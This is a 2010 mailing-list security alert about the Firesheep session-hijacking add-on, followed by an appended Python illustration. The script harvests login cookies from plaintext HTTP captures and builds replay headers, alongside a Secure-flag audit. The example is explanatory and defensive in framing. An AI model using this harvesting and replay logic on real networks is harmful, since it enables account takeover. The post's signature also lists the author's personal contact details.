[access-uk] Fire Sheep - Security Alert

Hi,
I apologise for the slapdash manner of this mail.  However, this is truly
vital and worrying.  So much so that I got up out of my nice warm comfortable bed
to make as many of you aware as possible.  Sounds like scaremongering
language?  Read on.
I've just learned about this.  It is major, major, majorly worrying and must
be addressed.

I am going to attempt to explain in a (hopefully) straightforward manner
and will post links below for you to read up about this more.

A lot of folks (including myself) have for years and years been aware of
security vulnerabilities concerning what are called session cookies.  In
particular, session cookies that are sent from a web site not using any form
of SSL encryption.  That is, without any form of protection for you while you do your
thing on the net.

It boils down like this.  If you log into, say, your Facebook account, when
you log in your username and password are sent to Facebook through a secure
connection.  However, once that authentication has taken place (once
Facebook confirms you've supplied the correct username/password and
lets you in), the site then goes back into a non-secure mode.  Facebook (in
my example) puts a cookie file onto your machine.  The cookie is just a
text file with some information relating to that time you are on the site.

Where this becomes a problem is if you are on an Internet connection that is
not secure: that information is being sent unencrypted, or in an easy-to-see
format.  So easy that a plug-in has been developed for the Firefox
web browser to show exactly how "out there" your personal details can be.
Below is a YouTube video (that has decent dialogue) demoing this plug-in's
capabilities.  In a nutshell, using this plug-in you can view other people who
are connected to your wireless network and what they are up to on selected
websites.  Not only view; in fact, hijack that Facebook/Twitter/etc. session,
so you can log in and act as if you are that person.

This becomes doubly serious when used in an area where free or open WIFI is
used.  That is, a WIFI connection that does not prompt for a password or
other form of authentication.  E.g. Starbucks, a library, an airport, or
your own home WIFI connection if you have just left it open.  Using this
plug-in for Firefox you can do all of the above to any person's Facebook etc.
accounts.  You used to have to use some crypto stuff in Linux to do this.
But this concept plug-in demonstrates nicely how serious this (unencrypted)
problem really is.

On sites like Facebook etc. they should pull their fingers out and use SSL
encryption throughout your session (or time) when logged in.  At home and in
your business/coffee shop etc. they should not be using open WIFI but
something like WPA, to help protect themselves from legal recourse and their
customers' privacy.

Further information here

YouTube demo - Hijack Facebook, Myspace, Twitter and more!
http://is.gd/gw1zW

Security Now, where I first heard about the Firesheep plug-in for Firefox:
"Firesheep
After catching up with a very busy week of security-related news and events,
Steve and Leo celebrate the game-changing creation and release of "Firesheep",
an add-on for the Firefox web browser which makes online web session hijacking
as easy as it could possibly be. This WILL change the world for the better."
https://www.grc.com/securitynow.htm
Text transcript of the show and various mp3s can be had there.

A good blog entry that includes snippets from an interview with the guy who
wrote the plug-in and explains nicely what I and others are in such a
flap over.
Firesheep In Wolves' Clothing: Extension Lets You Hack Into Twitter,
Facebook Accounts Easily
http://techcrunch.com/2010/10/24/firesheep-in-wolves-clothing-app-lets-you-hack-into-twitter-facebook-accounts-easily/



Barry Toner
Microsoft Certified Professional Technology Specialist (MCTS)

BCS Belfast Branch
YPG Representative & Disability Group
http://www.bcs.org/server.php?show=nav.10444

Contact me @
Professional:  barry.toner@xxxxxxxxxx
Personal Email:  barry@xxxxxxxxxxxxxxxxx
MSN/Live:  djpaddy@xxxxxxxxxxxxx
AIM/FB:  barry@xxxxxxxxxxxxxxxxx
TWITTER: dj_paddy
Skype:  djpaddy
Mobile:  (UK) +44 (0) 7921 611 253
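The mechanism Barry describes, shown as an added example (this is illustrative code written for this page; it is not Firesheep's code and not from the original post). It models what a passive sniffer on an open Wi-Fi network does: read plaintext HTTP requests on port 80, pick out the cookies that a per-site handler knows identify a logged-in session, and assemble the Cookie header needed to ride that session. It then checks a server's Set-Cookie header for the Secure flag, which is the site-side fix: a cookie marked Secure is never sent over plain http://, so there is nothing for the sniffer to read. The hosts, cookie names and captured requests are all constructed for the example; they are not the real cookie names of Facebook, Twitter or any other site.

```python
"""Firesheep-style session-cookie harvesting over plaintext HTTP (added example)."""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Constructed for this example: the "site handlers" a Firesheep-style tool
# carries, mapping a host to the cookie names that identify a login session.
# Hypothetical hosts and names; real sites' cookie names are not taken from the post.
SESSION_COOKIE_NAMES = {
    "social.example": {"sid", "auth"},
    "micro.example": {"session_token"},
}


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: Dict[str, str]  # lower-cased header name -> value


def parse_http_request(raw: bytes) -> HttpRequest:
    """Parse the request line and headers of one plaintext HTTP request."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)  # ValueError if not HTTP
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers)


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Split 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies: Dict[str, str] = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies


def extract_session(req: HttpRequest) -> Optional[Tuple[str, Dict[str, str]]]:
    """Return (host, session cookies) if this request carries a known login cookie."""
    host = req.headers.get("host", "").split(":")[0]
    wanted = SESSION_COOKIE_NAMES.get(host)
    if not wanted or "cookie" not in req.headers:
        return None
    cookies = parse_cookie_header(req.headers["cookie"])
    found = {k: v for k, v in cookies.items() if k in wanted}
    return (host, found) if found else None


def harvest(captures) -> Dict[Tuple[str, str], Dict[str, str]]:
    """captures: iterable of (client_ip, dst_port, raw_bytes) as seen on the air.

    Only port-80 traffic is readable. Anything the site sent over TLS (port 443)
    reaches the sniffer as ciphertext, which is exactly why all-HTTPS sessions fix this.
    """
    sessions: Dict[Tuple[str, str], Dict[str, str]] = {}
    for client_ip, dst_port, raw in captures:
        if dst_port != 80:
            continue  # encrypted in transit; nothing to parse
        try:
            req = parse_http_request(raw)
        except ValueError:
            continue  # not an HTTP request line
        hit = extract_session(req)
        if hit:
            host, cookies = hit
            sessions.setdefault((host, client_ip), {}).update(cookies)
    return sessions


def replay_cookie_header(cookies: Dict[str, str]) -> str:
    """The Cookie header a browser would send to present the stolen session as its own."""
    return "; ".join(f"{k}={v}" for k, v in sorted(cookies.items()))


def audit_set_cookie(set_cookie: str) -> list:
    """Report the attributes a server's Set-Cookie is missing that keep it off the wire."""
    attrs = {p.strip().split("=", 1)[0].lower() for p in set_cookie.split(";")[1:]}
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: browser will send this cookie over plain http://")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable by page script")
    return findings


# Constructed sample capture: three plaintext requests and one TLS record.
CAPTURES = [
    ("192.168.1.23", 80, b"GET /home HTTP/1.1\r\nHost: social.example\r\n"
                         b"Cookie: sid=abc123; theme=dark; auth=tok9\r\n\r\n"),
    ("192.168.1.23", 443, b"\x16\x03\x01\x00\x5a\x01\x00\x00\x56"),  # TLS ClientHello fragment
    ("192.168.1.40", 80, b"GET /timeline HTTP/1.1\r\nHost: micro.example\r\n"
                         b"Cookie: session_token=zzz; lang=en\r\n\r\n"),
    ("192.168.1.55", 80, b"GET /news HTTP/1.1\r\nHost: news.example\r\nCookie: visitor=1\r\n\r\n"),
]

if __name__ == "__main__":
    for (host, ip), cookies in harvest(CAPTURES).items():
        print(f"{ip} -> {host}: Cookie: {replay_cookie_header(cookies)}")
    print(audit_set_cookie("sid=abc123; Path=/; HttpOnly"))
```

The third capture is ignored because no handler exists for that host, and the 443 capture is skipped because only ciphertext is visible; that second case is the whole point of the "SSL throughout the session" recommendation above. On the site side, `audit_set_cookie` flags a session cookie issued without `Secure`, which is what lets a browser leak it on the first plain http:// request after login.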


